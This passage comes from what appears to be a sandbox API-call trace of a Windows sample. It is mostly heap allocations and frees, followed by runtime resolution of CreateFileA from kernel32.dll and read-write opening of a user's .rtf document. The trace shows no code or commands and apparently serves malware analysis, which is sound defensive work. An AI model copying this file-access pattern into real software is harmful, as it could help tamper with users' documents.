Size=0x10) returned 0x889670 [0033.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0033.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0033.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0033.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0033.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0033.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0033.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0033.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0033.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0033.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0033.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0033.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0033.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0033.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0033.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0033.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0033.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0033.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0033.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0033.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0033.208] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0033.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0033.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0033.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0033.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0033.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0033.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0033.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0033.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0033.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0033.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0033.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0033.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0033.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0033.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0033.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0033.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0033.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.211] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0033.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ccb8 [0033.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ccb8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0033.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0033.211] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0033.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0033.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccb8 [0033.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88ccb8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0033.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0033.211] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0033.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0033.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x88ffb0 [0033.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0033.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3e) returned 0x7ab260 [0033.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf", cchWideChar=62, lpMultiByteStr=0x7ab260, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf", lpUsedDefaultChar=0x0) returned 62 [0033.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.212] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\j7zhze0f-vckebn69.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0033.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0033.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0033.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0033.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0033.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0033.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0033.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=62, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0033.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7c) returned 0x7d5c40 [0033.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=62, lpWideCharStr=0x7d5c40, cchWideChar=62 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf") returned 62 [0033.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0033.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0033.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0033.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0033.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0033.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0033.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0033.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0033.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0033.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0033.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0033.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0033.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0033.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0033.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0033.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0033.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0033.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0033.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0033.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0033.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0033.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0033.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0033.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: 